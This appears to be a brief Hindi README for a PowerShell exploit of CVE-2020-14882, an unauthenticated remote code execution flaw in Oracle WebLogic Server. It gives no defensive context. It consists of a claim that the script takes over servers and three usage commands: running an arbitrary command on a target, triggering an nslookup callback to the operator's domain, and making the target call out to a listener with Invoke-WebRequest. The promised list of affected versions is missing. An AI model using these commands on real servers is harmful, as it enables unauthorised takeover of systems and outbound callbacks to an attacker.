
PowerShell में फिर से लिखा गया CVE-2020-14882
यह PowerShell स्क्रिप्ट CVE-2020-14882 का उपयोग करके Oracle WebLogic सर्वर के निम्नलिखित संस्करणों पर बिना प्रमाणीकरण के दूरस्थ कोड निष्पादन प्राप्त करती है:
.\exploit.ps1 -target 'http(s)://target:7001' -command 'your_command'
.\exploit.ps1 -target 'http(s)://target:7001' -command 'nslookup your_Domain'
.\exploit.ps1 -target 'http(s)://target:7001' -command 'powershell.exe -c Invoke-WebRequest -Uri http://your_listener'